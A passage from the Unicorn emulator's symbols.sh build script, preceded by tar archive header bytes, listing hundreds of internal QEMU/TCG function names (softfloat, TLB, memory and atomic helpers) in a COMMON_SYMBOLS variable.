����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/symbols.sh����������������������������������������������������������������������������0000775�0000000�0000000�00000406163�14675241067�0015245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash CMD_PATH=$(realpath $0) SOURCE_DIR=$(dirname ${CMD_PATH}) COMMON_SYMBOLS=" unicorn_fill_tlb \ reg_read \ reg_write \ uc_init \ uc_add_inline_hook \ uc_del_inline_hook \ tb_invalidate_phys_range \ use_idiv_instructions \ arm_arch \ tb_target_set_jmp_target \ have_bmi1 \ have_popcnt \ have_avx1 \ have_avx2 \ have_isa \ have_altivec \ have_vsx \ flush_icache_range \ s390_facilities \ tcg_dump_op \ tcg_dump_ops \ tcg_gen_and_i64 \ tcg_gen_discard_i64 \ tcg_gen_ld16s_i64 \ tcg_gen_ld16u_i64 \ tcg_gen_ld32s_i64 \ tcg_gen_ld32u_i64 \ tcg_gen_ld8s_i64 \ tcg_gen_ld8u_i64 \ tcg_gen_ld_i64 \ tcg_gen_mov_i64 \ tcg_gen_movi_i64 \ tcg_gen_mul_i64 \ tcg_gen_or_i64 \ tcg_gen_sar_i64 \ tcg_gen_shl_i64 \ tcg_gen_shr_i64 \ tcg_gen_st_i64 \ tcg_gen_xor_i64 \ cpu_icount_to_ns \ cpu_is_stopped \ cpu_get_ticks \ cpu_get_clock \ cpu_resume \ qemu_init_vcpu \ cpu_stop_current \ resume_all_vcpus \ vm_start \ address_space_dispatch_compact \ flatview_translate \ address_space_translate_for_iotlb \ qemu_get_cpu \ cpu_address_space_init \ cpu_get_address_space \ cpu_exec_unrealizefn \ cpu_exec_initfn \ cpu_exec_realizefn \ tb_invalidate_phys_addr \ cpu_watchpoint_insert \ cpu_watchpoint_remove_by_ref \ cpu_watchpoint_remove_all \ cpu_watchpoint_address_matches \ cpu_breakpoint_insert \ cpu_breakpoint_remove \ cpu_breakpoint_remove_by_ref \ cpu_breakpoint_remove_all \ cpu_abort \ cpu_physical_memory_test_and_clear_dirty \ memory_region_section_get_iotlb \ flatview_add_to_dispatch \ qemu_ram_get_host_addr \ qemu_ram_get_offset \ qemu_ram_get_used_length \ qemu_ram_is_shared \ qemu_ram_pagesize \ qemu_ram_alloc_from_ptr \ qemu_ram_alloc \ qemu_ram_free \ qemu_map_ram_ptr \ qemu_ram_block_host_offset \ qemu_ram_block_from_host \ qemu_ram_addr_from_host \ cpu_check_watchpoint \ iotlb_to_section \ address_space_dispatch_new \ address_space_dispatch_free \ flatview_read_continue \ address_space_read_full \ address_space_write \ address_space_rw \ cpu_physical_memory_rw \ address_space_write_rom \ cpu_flush_icache_range \ cpu_exec_init_all \ address_space_access_valid \ address_space_map \ address_space_unmap \ cpu_physical_memory_map \ cpu_physical_memory_unmap \ cpu_memory_rw_debug \ qemu_target_page_size \ qemu_target_page_bits \ qemu_target_page_bits_min \ target_words_bigendian \ cpu_physical_memory_is_io \ ram_block_discard_range \ ramblock_is_pmem \ page_size_init \ set_preferred_target_page_bits \ finalize_target_page_bits \ cpu_outb \ cpu_outw \ cpu_outl \ cpu_inb \ cpu_inw \ cpu_inl \ memory_map \ memory_map_io \ memory_map_ptr \ memory_cow \ memory_unmap \ memory_moveout \ memory_movein \ memory_free \ flatview_unref \ address_space_get_flatview \ memory_region_transaction_begin \ memory_region_transaction_commit \ 
memory_region_init \ memory_region_access_valid \ memory_region_dispatch_read \ memory_region_dispatch_write \ memory_region_init_io \ memory_region_init_ram_ptr \ memory_region_size \ memory_region_set_readonly \ memory_region_get_ram_ptr \ memory_region_from_host \ memory_region_get_ram_addr \ memory_region_add_subregion \ memory_region_del_subregion \ memory_region_add_subregion_overlap \ memory_region_find \ memory_region_filter_subregions \ memory_listener_register \ memory_listener_unregister \ address_space_remove_listeners \ address_space_init \ address_space_destroy \ memory_region_init_ram \ memory_mapping_list_add_merge_sorted \ find_memory_mapping \ exec_inline_op \ floatx80_default_nan \ float_raise \ float16_is_quiet_nan \ float16_is_signaling_nan \ float32_is_quiet_nan \ float32_is_signaling_nan \ float64_is_quiet_nan \ float64_is_signaling_nan \ floatx80_is_quiet_nan \ floatx80_is_signaling_nan \ floatx80_silence_nan \ propagateFloatx80NaN \ float128_is_quiet_nan \ float128_is_signaling_nan \ float128_silence_nan \ float16_add \ float16_sub \ float32_add \ float32_sub \ float64_add \ float64_sub \ float16_mul \ float32_mul \ float64_mul \ float16_muladd \ float32_muladd \ float64_muladd \ float16_div \ float32_div \ float64_div \ float16_to_float32 \ float16_to_float64 \ float32_to_float16 \ float32_to_float64 \ float64_to_float16 \ float64_to_float32 \ float16_round_to_int \ float32_round_to_int \ float64_round_to_int \ float16_to_int16_scalbn \ float16_to_int32_scalbn \ float16_to_int64_scalbn \ float32_to_int16_scalbn \ float32_to_int32_scalbn \ float32_to_int64_scalbn \ float64_to_int16_scalbn \ float64_to_int32_scalbn \ float64_to_int64_scalbn \ float16_to_int16 \ float16_to_int32 \ float16_to_int64 \ float32_to_int16 \ float32_to_int32 \ float32_to_int64 \ float64_to_int16 \ float64_to_int32 \ float64_to_int64 \ float16_to_int16_round_to_zero \ float16_to_int32_round_to_zero \ float16_to_int64_round_to_zero \ float32_to_int16_round_to_zero \ float32_to_int32_round_to_zero \ float32_to_int64_round_to_zero \ float64_to_int16_round_to_zero \ float64_to_int32_round_to_zero \ float64_to_int64_round_to_zero \ float16_to_uint16_scalbn \ float16_to_uint32_scalbn \ float16_to_uint64_scalbn \ float32_to_uint16_scalbn \ float32_to_uint32_scalbn \ float32_to_uint64_scalbn \ float64_to_uint16_scalbn \ float64_to_uint32_scalbn \ float64_to_uint64_scalbn \ float16_to_uint16 \ float16_to_uint32 \ float16_to_uint64 \ float32_to_uint16 \ float32_to_uint32 \ float32_to_uint64 \ float64_to_uint16 \ float64_to_uint32 \ float64_to_uint64 \ float16_to_uint16_round_to_zero \ float16_to_uint32_round_to_zero \ float16_to_uint64_round_to_zero \ float32_to_uint16_round_to_zero \ float32_to_uint32_round_to_zero \ float32_to_uint64_round_to_zero \ float64_to_uint16_round_to_zero \ float64_to_uint32_round_to_zero \ float64_to_uint64_round_to_zero \ int64_to_float16_scalbn \ int32_to_float16_scalbn \ int16_to_float16_scalbn \ int64_to_float16 \ int32_to_float16 \ int16_to_float16 \ int64_to_float32_scalbn \ int32_to_float32_scalbn \ int16_to_float32_scalbn \ int64_to_float32 \ int32_to_float32 \ int16_to_float32 \ int64_to_float64_scalbn \ int32_to_float64_scalbn \ int16_to_float64_scalbn \ int64_to_float64 \ int32_to_float64 \ int16_to_float64 \ uint64_to_float16_scalbn \ uint32_to_float16_scalbn \ uint16_to_float16_scalbn \ uint64_to_float16 \ uint32_to_float16 \ uint16_to_float16 \ uint64_to_float32_scalbn \ uint32_to_float32_scalbn \ uint16_to_float32_scalbn \ uint64_to_float32 \ 
uint32_to_float32 \ uint16_to_float32 \ uint64_to_float64_scalbn \ uint32_to_float64_scalbn \ uint16_to_float64_scalbn \ uint64_to_float64 \ uint32_to_float64 \ uint16_to_float64 \ float16_min \ float16_minnum \ float16_minnummag \ float16_max \ float16_maxnum \ float16_maxnummag \ float32_min \ float32_minnum \ float32_minnummag \ float32_max \ float32_maxnum \ float32_maxnummag \ float64_min \ float64_minnum \ float64_minnummag \ float64_max \ float64_maxnum \ float64_maxnummag \ float16_compare \ float16_compare_quiet \ float32_compare \ float32_compare_quiet \ float64_compare \ float64_compare_quiet \ float16_scalbn \ float32_scalbn \ float64_scalbn \ float16_sqrt \ float32_sqrt \ float64_sqrt \ float16_default_nan \ float32_default_nan \ float64_default_nan \ float128_default_nan \ float16_silence_nan \ float32_silence_nan \ float64_silence_nan \ float16_squash_input_denormal \ float32_squash_input_denormal \ float64_squash_input_denormal \ normalizeFloatx80Subnormal \ roundAndPackFloatx80 \ normalizeRoundAndPackFloatx80 \ int32_to_floatx80 \ int32_to_float128 \ int64_to_floatx80 \ int64_to_float128 \ uint64_to_float128 \ float32_to_floatx80 \ float32_to_float128 \ float32_rem \ float32_exp2 \ float32_log2 \ float32_eq \ float32_le \ float32_lt \ float32_unordered \ float32_eq_quiet \ float32_le_quiet \ float32_lt_quiet \ float32_unordered_quiet \ float64_to_floatx80 \ float64_to_float128 \ float64_rem \ float64_log2 \ float64_eq \ float64_le \ float64_lt \ float64_unordered \ float64_eq_quiet \ float64_le_quiet \ float64_lt_quiet \ float64_unordered_quiet \ floatx80_to_int32 \ floatx80_to_int32_round_to_zero \ floatx80_to_int64 \ floatx80_to_int64_round_to_zero \ floatx80_to_float32 \ floatx80_to_float64 \ floatx80_to_float128 \ floatx80_round \ floatx80_round_to_int \ floatx80_add \ floatx80_sub \ floatx80_mul \ floatx80_div \ floatx80_rem \ floatx80_sqrt \ floatx80_eq \ floatx80_le \ floatx80_lt \ floatx80_unordered \ floatx80_eq_quiet \ floatx80_le_quiet \ floatx80_lt_quiet \ floatx80_unordered_quiet \ float128_to_int32 \ float128_to_int32_round_to_zero \ float128_to_int64 \ float128_to_int64_round_to_zero \ float128_to_uint64 \ float128_to_uint64_round_to_zero \ float128_to_uint32_round_to_zero \ float128_to_uint32 \ float128_to_float32 \ float128_to_float64 \ float128_to_floatx80 \ float128_round_to_int \ float128_add \ float128_sub \ float128_mul \ float128_div \ float128_rem \ float128_sqrt \ float128_eq \ float128_le \ float128_lt \ float128_unordered \ float128_eq_quiet \ float128_le_quiet \ float128_lt_quiet \ float128_unordered_quiet \ floatx80_compare \ floatx80_compare_quiet \ float128_compare \ float128_compare_quiet \ floatx80_scalbn \ float128_scalbn \ softfloat_init \ tcg_optimize \ gen_new_label \ tcg_can_emit_vec_op \ tcg_expand_vec_op \ tcg_register_jit \ tcg_tb_insert \ tcg_tb_remove \ tcg_tb_lookup \ tcg_tb_foreach \ tcg_nb_tbs \ tcg_region_reset_all \ tcg_region_init \ tcg_code_size \ tcg_code_capacity \ tcg_tb_phys_invalidate_count \ tcg_malloc_internal \ tcg_pool_reset \ tcg_context_init \ tcg_tb_alloc \ tcg_prologue_init \ tcg_func_start \ tcg_set_frame \ tcg_global_mem_new_internal \ tcg_temp_new_internal \ tcg_temp_new_vec \ tcg_temp_new_vec_matching \ tcg_temp_free_internal \ tcg_const_i32 \ tcg_const_i64 \ tcg_const_local_i32 \ tcg_const_local_i64 \ tcg_op_supported \ tcg_gen_callN \ tcg_op_remove \ tcg_emit_op \ tcg_op_insert_before \ tcg_op_insert_after \ tcg_cpu_exec_time \ tcg_gen_code \ tcg_gen_op1 \ tcg_gen_op2 \ tcg_gen_op3 \ tcg_gen_op4 \ 
tcg_gen_op5 \ tcg_gen_op6 \ tcg_gen_mb \ tcg_gen_addi_i32 \ tcg_gen_subfi_i32 \ tcg_gen_subi_i32 \ tcg_gen_andi_i32 \ tcg_gen_ori_i32 \ tcg_gen_xori_i32 \ tcg_gen_shli_i32 \ tcg_gen_shri_i32 \ tcg_gen_sari_i32 \ tcg_gen_brcond_i32 \ tcg_gen_brcondi_i32 \ tcg_gen_setcond_i32 \ tcg_gen_setcondi_i32 \ tcg_gen_muli_i32 \ tcg_gen_div_i32 \ tcg_gen_rem_i32 \ tcg_gen_divu_i32 \ tcg_gen_remu_i32 \ tcg_gen_andc_i32 \ tcg_gen_eqv_i32 \ tcg_gen_nand_i32 \ tcg_gen_nor_i32 \ tcg_gen_orc_i32 \ tcg_gen_clz_i32 \ tcg_gen_clzi_i32 \ tcg_gen_ctz_i32 \ tcg_gen_ctzi_i32 \ tcg_gen_clrsb_i32 \ tcg_gen_ctpop_i32 \ tcg_gen_rotl_i32 \ tcg_gen_rotli_i32 \ tcg_gen_rotr_i32 \ tcg_gen_rotri_i32 \ tcg_gen_deposit_i32 \ tcg_gen_deposit_z_i32 \ tcg_gen_extract_i32 \ tcg_gen_sextract_i32 \ tcg_gen_extract2_i32 \ tcg_gen_movcond_i32 \ tcg_gen_add2_i32 \ tcg_gen_sub2_i32 \ tcg_gen_mulu2_i32 \ tcg_gen_muls2_i32 \ tcg_gen_mulsu2_i32 \ tcg_gen_ext8s_i32 \ tcg_gen_ext16s_i32 \ tcg_gen_ext8u_i32 \ tcg_gen_ext16u_i32 \ tcg_gen_bswap16_i32 \ tcg_gen_bswap32_i32 \ tcg_gen_smin_i32 \ tcg_gen_umin_i32 \ tcg_gen_smax_i32 \ tcg_gen_umax_i32 \ tcg_gen_abs_i32 \ tcg_gen_addi_i64 \ tcg_gen_subfi_i64 \ tcg_gen_subi_i64 \ tcg_gen_andi_i64 \ tcg_gen_ori_i64 \ tcg_gen_xori_i64 \ tcg_gen_shli_i64 \ tcg_gen_shri_i64 \ tcg_gen_sari_i64 \ tcg_gen_brcond_i64 \ tcg_gen_brcondi_i64 \ tcg_gen_setcond_i64 \ tcg_gen_setcondi_i64 \ tcg_gen_muli_i64 \ tcg_gen_div_i64 \ tcg_gen_rem_i64 \ tcg_gen_divu_i64 \ tcg_gen_remu_i64 \ tcg_gen_ext8s_i64 \ tcg_gen_ext16s_i64 \ tcg_gen_ext32s_i64 \ tcg_gen_ext8u_i64 \ tcg_gen_ext16u_i64 \ tcg_gen_ext32u_i64 \ tcg_gen_bswap16_i64 \ tcg_gen_bswap32_i64 \ tcg_gen_bswap64_i64 \ tcg_gen_not_i64 \ tcg_gen_andc_i64 \ tcg_gen_eqv_i64 \ tcg_gen_nand_i64 \ tcg_gen_nor_i64 \ tcg_gen_orc_i64 \ tcg_gen_clz_i64 \ tcg_gen_clzi_i64 \ tcg_gen_ctz_i64 \ tcg_gen_ctzi_i64 \ tcg_gen_clrsb_i64 \ tcg_gen_ctpop_i64 \ tcg_gen_rotl_i64 \ tcg_gen_rotli_i64 \ tcg_gen_rotr_i64 \ tcg_gen_rotri_i64 \ tcg_gen_deposit_i64 \ tcg_gen_deposit_z_i64 \ tcg_gen_extract_i64 \ tcg_gen_sextract_i64 \ tcg_gen_extract2_i64 \ tcg_gen_movcond_i64 \ tcg_gen_add2_i64 \ tcg_gen_sub2_i64 \ tcg_gen_mulu2_i64 \ tcg_gen_muls2_i64 \ tcg_gen_mulsu2_i64 \ tcg_gen_smin_i64 \ tcg_gen_umin_i64 \ tcg_gen_smax_i64 \ tcg_gen_umax_i64 \ tcg_gen_abs_i64 \ tcg_gen_extrl_i64_i32 \ tcg_gen_extrh_i64_i32 \ tcg_gen_extu_i32_i64 \ tcg_gen_ext_i32_i64 \ tcg_gen_concat_i32_i64 \ tcg_gen_extr_i64_i32 \ tcg_gen_extr32_i64 \ tcg_gen_exit_tb \ tcg_gen_goto_tb \ tcg_gen_lookup_and_goto_ptr \ check_exit_request \ tcg_gen_qemu_ld_i32 \ tcg_gen_qemu_st_i32 \ tcg_gen_qemu_ld_i64 \ tcg_gen_qemu_st_i64 \ tcg_gen_atomic_cmpxchg_i32 \ tcg_gen_atomic_cmpxchg_i64 \ tcg_gen_atomic_fetch_add_i32 \ tcg_gen_atomic_fetch_add_i64 \ tcg_gen_atomic_fetch_and_i32 \ tcg_gen_atomic_fetch_and_i64 \ tcg_gen_atomic_fetch_or_i32 \ tcg_gen_atomic_fetch_or_i64 \ tcg_gen_atomic_fetch_xor_i32 \ tcg_gen_atomic_fetch_xor_i64 \ tcg_gen_atomic_fetch_smin_i32 \ tcg_gen_atomic_fetch_smin_i64 \ tcg_gen_atomic_fetch_umin_i32 \ tcg_gen_atomic_fetch_umin_i64 \ tcg_gen_atomic_fetch_smax_i32 \ tcg_gen_atomic_fetch_smax_i64 \ tcg_gen_atomic_fetch_umax_i32 \ tcg_gen_atomic_fetch_umax_i64 \ tcg_gen_atomic_add_fetch_i32 \ tcg_gen_atomic_add_fetch_i64 \ tcg_gen_atomic_and_fetch_i32 \ tcg_gen_atomic_and_fetch_i64 \ tcg_gen_atomic_or_fetch_i32 \ tcg_gen_atomic_or_fetch_i64 \ tcg_gen_atomic_xor_fetch_i32 \ tcg_gen_atomic_xor_fetch_i64 \ tcg_gen_atomic_smin_fetch_i32 \ tcg_gen_atomic_smin_fetch_i64 \ tcg_gen_atomic_umin_fetch_i32 \ 
tcg_gen_atomic_umin_fetch_i64 \ tcg_gen_atomic_smax_fetch_i32 \ tcg_gen_atomic_smax_fetch_i64 \ tcg_gen_atomic_umax_fetch_i32 \ tcg_gen_atomic_umax_fetch_i64 \ tcg_gen_atomic_xchg_i32 \ tcg_gen_atomic_xchg_i64 \ simd_desc \ tcg_gen_gvec_2_ool \ tcg_gen_gvec_2i_ool \ tcg_gen_gvec_3_ool \ tcg_gen_gvec_4_ool \ tcg_gen_gvec_5_ool \ tcg_gen_gvec_2_ptr \ tcg_gen_gvec_3_ptr \ tcg_gen_gvec_4_ptr \ tcg_gen_gvec_5_ptr \ tcg_gen_gvec_2 \ tcg_gen_gvec_2i \ tcg_gen_gvec_2s \ tcg_gen_gvec_3 \ tcg_gen_gvec_3i \ tcg_gen_gvec_4 \ tcg_gen_gvec_mov \ tcg_gen_gvec_dup_i32 \ tcg_gen_gvec_dup_i64 \ tcg_gen_gvec_dup_mem \ tcg_gen_gvec_dup64i \ tcg_gen_gvec_dup32i \ tcg_gen_gvec_dup16i \ tcg_gen_gvec_dup8i \ tcg_gen_gvec_not \ tcg_gen_vec_add8_i64 \ tcg_gen_vec_add16_i64 \ tcg_gen_vec_add32_i64 \ tcg_gen_gvec_add \ tcg_gen_gvec_adds \ tcg_gen_gvec_addi \ tcg_gen_gvec_subs \ tcg_gen_vec_sub8_i64 \ tcg_gen_vec_sub16_i64 \ tcg_gen_vec_sub32_i64 \ tcg_gen_gvec_sub \ tcg_gen_gvec_mul \ tcg_gen_gvec_muls \ tcg_gen_gvec_muli \ tcg_gen_gvec_ssadd \ tcg_gen_gvec_sssub \ tcg_gen_gvec_usadd \ tcg_gen_gvec_ussub \ tcg_gen_gvec_smin \ tcg_gen_gvec_umin \ tcg_gen_gvec_smax \ tcg_gen_gvec_umax \ tcg_gen_vec_neg8_i64 \ tcg_gen_vec_neg16_i64 \ tcg_gen_vec_neg32_i64 \ tcg_gen_gvec_neg \ tcg_gen_gvec_abs \ tcg_gen_gvec_and \ tcg_gen_gvec_or \ tcg_gen_gvec_xor \ tcg_gen_gvec_andc \ tcg_gen_gvec_orc \ tcg_gen_gvec_nand \ tcg_gen_gvec_nor \ tcg_gen_gvec_eqv \ tcg_gen_gvec_ands \ tcg_gen_gvec_andi \ tcg_gen_gvec_xors \ tcg_gen_gvec_xori \ tcg_gen_gvec_ors \ tcg_gen_gvec_ori \ tcg_gen_vec_shl8i_i64 \ tcg_gen_vec_shl16i_i64 \ tcg_gen_gvec_shli \ tcg_gen_vec_shr8i_i64 \ tcg_gen_vec_shr16i_i64 \ tcg_gen_gvec_shri \ tcg_gen_vec_sar8i_i64 \ tcg_gen_vec_sar16i_i64 \ tcg_gen_gvec_sari \ tcg_gen_gvec_shls \ tcg_gen_gvec_shrs \ tcg_gen_gvec_sars \ tcg_gen_gvec_shlv \ tcg_gen_gvec_shrv \ tcg_gen_gvec_sarv \ tcg_gen_gvec_cmp \ tcg_gen_gvec_bitsel \ tcg_can_emit_vecop_list \ vec_gen_2 \ vec_gen_3 \ vec_gen_4 \ tcg_gen_mov_vec \ tcg_const_zeros_vec \ tcg_const_ones_vec \ tcg_const_zeros_vec_matching \ tcg_const_ones_vec_matching \ tcg_gen_dup64i_vec \ tcg_gen_dup32i_vec \ tcg_gen_dup16i_vec \ tcg_gen_dup8i_vec \ tcg_gen_dupi_vec \ tcg_gen_dup_i64_vec \ tcg_gen_dup_i32_vec \ tcg_gen_dup_mem_vec \ tcg_gen_ld_vec \ tcg_gen_st_vec \ tcg_gen_stl_vec \ tcg_gen_and_vec \ tcg_gen_or_vec \ tcg_gen_xor_vec \ tcg_gen_andc_vec \ tcg_gen_orc_vec \ tcg_gen_nand_vec \ tcg_gen_nor_vec \ tcg_gen_eqv_vec \ tcg_gen_not_vec \ tcg_gen_neg_vec \ tcg_gen_abs_vec \ tcg_gen_shli_vec \ tcg_gen_shri_vec \ tcg_gen_sari_vec \ tcg_gen_cmp_vec \ tcg_gen_add_vec \ tcg_gen_sub_vec \ tcg_gen_mul_vec \ tcg_gen_ssadd_vec \ tcg_gen_usadd_vec \ tcg_gen_sssub_vec \ tcg_gen_ussub_vec \ tcg_gen_smin_vec \ tcg_gen_umin_vec \ tcg_gen_smax_vec \ tcg_gen_umax_vec \ tcg_gen_shlv_vec \ tcg_gen_shrv_vec \ tcg_gen_sarv_vec \ tcg_gen_shls_vec \ tcg_gen_shrs_vec \ tcg_gen_sars_vec \ tcg_gen_bitsel_vec \ tcg_gen_cmpsel_vec \ tb_htable_lookup \ tb_set_jmp_target \ cpu_exec \ cpu_loop_exit_noexc \ cpu_reloading_memory_map \ cpu_loop_exit \ cpu_loop_exit_restore \ cpu_loop_exit_atomic \ tlb_init \ tlb_flush_by_mmuidx \ tlb_flush \ tlb_flush_by_mmuidx_all_cpus \ tlb_flush_all_cpus \ tlb_flush_by_mmuidx_all_cpus_synced \ tlb_flush_all_cpus_synced \ tlb_flush_page_by_mmuidx \ tlb_flush_page \ tlb_flush_page_by_mmuidx_all_cpus \ tlb_flush_page_all_cpus \ tlb_flush_page_by_mmuidx_all_cpus_synced \ tlb_flush_page_all_cpus_synced \ tlb_protect_code \ tlb_unprotect_code \ tlb_reset_dirty \ tlb_set_dirty \ 
tlb_set_page_with_attrs \ tlb_set_page \ get_page_addr_code_hostp \ get_page_addr_code \ probe_access \ tlb_vaddr_to_host \ helper_ret_ldub_mmu \ helper_le_lduw_mmu \ helper_be_lduw_mmu \ helper_le_ldul_mmu \ helper_be_ldul_mmu \ helper_le_ldq_mmu \ helper_be_ldq_mmu \ helper_ret_ldsb_mmu \ helper_le_ldsw_mmu \ helper_be_ldsw_mmu \ helper_le_ldsl_mmu \ helper_be_ldsl_mmu \ cpu_ldub_mmuidx_ra \ cpu_ldsb_mmuidx_ra \ cpu_lduw_mmuidx_ra \ cpu_ldsw_mmuidx_ra \ cpu_ldl_mmuidx_ra \ cpu_ldq_mmuidx_ra \ cpu_ldub_data_ra \ cpu_ldsb_data_ra \ cpu_lduw_data_ra \ cpu_ldsw_data_ra \ cpu_ldl_data_ra \ cpu_ldq_data_ra \ cpu_ldub_data \ cpu_ldsb_data \ cpu_lduw_data \ cpu_ldsw_data \ cpu_ldl_data \ cpu_ldq_data \ helper_ret_stb_mmu \ helper_le_stw_mmu \ helper_be_stw_mmu \ helper_le_stl_mmu \ helper_be_stl_mmu \ helper_le_stq_mmu \ helper_be_stq_mmu \ cpu_stb_mmuidx_ra \ cpu_stw_mmuidx_ra \ cpu_stl_mmuidx_ra \ cpu_stq_mmuidx_ra \ cpu_stb_data_ra \ cpu_stw_data_ra \ cpu_stl_data_ra \ cpu_stq_data_ra \ cpu_stb_data \ cpu_stw_data \ cpu_stl_data \ cpu_stq_data \ helper_atomic_cmpxchgb_mmu \ helper_atomic_xchgb_mmu \ helper_atomic_fetch_addb_mmu \ helper_atomic_fetch_andb_mmu \ helper_atomic_fetch_orb_mmu \ helper_atomic_fetch_xorb_mmu \ helper_atomic_add_fetchb_mmu \ helper_atomic_and_fetchb_mmu \ helper_atomic_or_fetchb_mmu \ helper_atomic_xor_fetchb_mmu \ helper_atomic_fetch_sminb_mmu \ helper_atomic_fetch_uminb_mmu \ helper_atomic_fetch_smaxb_mmu \ helper_atomic_fetch_umaxb_mmu \ helper_atomic_smin_fetchb_mmu \ helper_atomic_umin_fetchb_mmu \ helper_atomic_smax_fetchb_mmu \ helper_atomic_umax_fetchb_mmu \ helper_atomic_cmpxchgw_le_mmu \ helper_atomic_xchgw_le_mmu \ helper_atomic_fetch_addw_le_mmu \ helper_atomic_fetch_andw_le_mmu \ helper_atomic_fetch_orw_le_mmu \ helper_atomic_fetch_xorw_le_mmu \ helper_atomic_add_fetchw_le_mmu \ helper_atomic_and_fetchw_le_mmu \ helper_atomic_or_fetchw_le_mmu \ helper_atomic_xor_fetchw_le_mmu \ helper_atomic_fetch_sminw_le_mmu \ helper_atomic_fetch_uminw_le_mmu \ helper_atomic_fetch_smaxw_le_mmu \ helper_atomic_fetch_umaxw_le_mmu \ helper_atomic_smin_fetchw_le_mmu \ helper_atomic_umin_fetchw_le_mmu \ helper_atomic_smax_fetchw_le_mmu \ helper_atomic_umax_fetchw_le_mmu \ helper_atomic_cmpxchgw_be_mmu \ helper_atomic_xchgw_be_mmu \ helper_atomic_fetch_andw_be_mmu \ helper_atomic_fetch_orw_be_mmu \ helper_atomic_fetch_xorw_be_mmu \ helper_atomic_and_fetchw_be_mmu \ helper_atomic_or_fetchw_be_mmu \ helper_atomic_xor_fetchw_be_mmu \ helper_atomic_fetch_sminw_be_mmu \ helper_atomic_fetch_uminw_be_mmu \ helper_atomic_fetch_smaxw_be_mmu \ helper_atomic_fetch_umaxw_be_mmu \ helper_atomic_smin_fetchw_be_mmu \ helper_atomic_umin_fetchw_be_mmu \ helper_atomic_smax_fetchw_be_mmu \ helper_atomic_umax_fetchw_be_mmu \ helper_atomic_fetch_addw_be_mmu \ helper_atomic_add_fetchw_be_mmu \ helper_atomic_cmpxchgl_le_mmu \ helper_atomic_xchgl_le_mmu \ helper_atomic_fetch_addl_le_mmu \ helper_atomic_fetch_andl_le_mmu \ helper_atomic_fetch_orl_le_mmu \ helper_atomic_fetch_xorl_le_mmu \ helper_atomic_add_fetchl_le_mmu \ helper_atomic_and_fetchl_le_mmu \ helper_atomic_or_fetchl_le_mmu \ helper_atomic_xor_fetchl_le_mmu \ helper_atomic_fetch_sminl_le_mmu \ helper_atomic_fetch_uminl_le_mmu \ helper_atomic_fetch_smaxl_le_mmu \ helper_atomic_fetch_umaxl_le_mmu \ helper_atomic_smin_fetchl_le_mmu \ helper_atomic_umin_fetchl_le_mmu \ helper_atomic_smax_fetchl_le_mmu \ helper_atomic_umax_fetchl_le_mmu \ helper_atomic_cmpxchgl_be_mmu \ helper_atomic_xchgl_be_mmu \ helper_atomic_fetch_andl_be_mmu \ 
helper_atomic_fetch_orl_be_mmu \ helper_atomic_fetch_xorl_be_mmu \ helper_atomic_and_fetchl_be_mmu \ helper_atomic_or_fetchl_be_mmu \ helper_atomic_xor_fetchl_be_mmu \ helper_atomic_fetch_sminl_be_mmu \ helper_atomic_fetch_uminl_be_mmu \ helper_atomic_fetch_smaxl_be_mmu \ helper_atomic_fetch_umaxl_be_mmu \ helper_atomic_smin_fetchl_be_mmu \ helper_atomic_umin_fetchl_be_mmu \ helper_atomic_smax_fetchl_be_mmu \ helper_atomic_umax_fetchl_be_mmu \ helper_atomic_fetch_addl_be_mmu \ helper_atomic_add_fetchl_be_mmu \ helper_atomic_cmpxchgq_le_mmu \ helper_atomic_xchgq_le_mmu \ helper_atomic_fetch_addq_le_mmu \ helper_atomic_fetch_andq_le_mmu \ helper_atomic_fetch_orq_le_mmu \ helper_atomic_fetch_xorq_le_mmu \ helper_atomic_add_fetchq_le_mmu \ helper_atomic_and_fetchq_le_mmu \ helper_atomic_or_fetchq_le_mmu \ helper_atomic_xor_fetchq_le_mmu \ helper_atomic_fetch_sminq_le_mmu \ helper_atomic_fetch_uminq_le_mmu \ helper_atomic_fetch_smaxq_le_mmu \ helper_atomic_fetch_umaxq_le_mmu \ helper_atomic_smin_fetchq_le_mmu \ helper_atomic_umin_fetchq_le_mmu \ helper_atomic_smax_fetchq_le_mmu \ helper_atomic_umax_fetchq_le_mmu \ helper_atomic_cmpxchgq_be_mmu \ helper_atomic_xchgq_be_mmu \ helper_atomic_fetch_andq_be_mmu \ helper_atomic_fetch_orq_be_mmu \ helper_atomic_fetch_xorq_be_mmu \ helper_atomic_and_fetchq_be_mmu \ helper_atomic_or_fetchq_be_mmu \ helper_atomic_xor_fetchq_be_mmu \ helper_atomic_fetch_sminq_be_mmu \ helper_atomic_fetch_uminq_be_mmu \ helper_atomic_fetch_smaxq_be_mmu \ helper_atomic_fetch_umaxq_be_mmu \ helper_atomic_smin_fetchq_be_mmu \ helper_atomic_umin_fetchq_be_mmu \ helper_atomic_smax_fetchq_be_mmu \ helper_atomic_umax_fetchq_be_mmu \ helper_atomic_fetch_addq_be_mmu \ helper_atomic_add_fetchq_be_mmu \ helper_atomic_cmpxchgb \ helper_atomic_xchgb \ helper_atomic_fetch_addb \ helper_atomic_fetch_andb \ helper_atomic_fetch_orb \ helper_atomic_fetch_xorb \ helper_atomic_add_fetchb \ helper_atomic_and_fetchb \ helper_atomic_or_fetchb \ helper_atomic_xor_fetchb \ helper_atomic_fetch_sminb \ helper_atomic_fetch_uminb \ helper_atomic_fetch_smaxb \ helper_atomic_fetch_umaxb \ helper_atomic_smin_fetchb \ helper_atomic_umin_fetchb \ helper_atomic_smax_fetchb \ helper_atomic_umax_fetchb \ helper_atomic_cmpxchgw_le \ helper_atomic_xchgw_le \ helper_atomic_fetch_addw_le \ helper_atomic_fetch_andw_le \ helper_atomic_fetch_orw_le \ helper_atomic_fetch_xorw_le \ helper_atomic_add_fetchw_le \ helper_atomic_and_fetchw_le \ helper_atomic_or_fetchw_le \ helper_atomic_xor_fetchw_le \ helper_atomic_fetch_sminw_le \ helper_atomic_fetch_uminw_le \ helper_atomic_fetch_smaxw_le \ helper_atomic_fetch_umaxw_le \ helper_atomic_smin_fetchw_le \ helper_atomic_umin_fetchw_le \ helper_atomic_smax_fetchw_le \ helper_atomic_umax_fetchw_le \ helper_atomic_cmpxchgw_be \ helper_atomic_xchgw_be \ helper_atomic_fetch_andw_be \ helper_atomic_fetch_orw_be \ helper_atomic_fetch_xorw_be \ helper_atomic_and_fetchw_be \ helper_atomic_or_fetchw_be \ helper_atomic_xor_fetchw_be \ 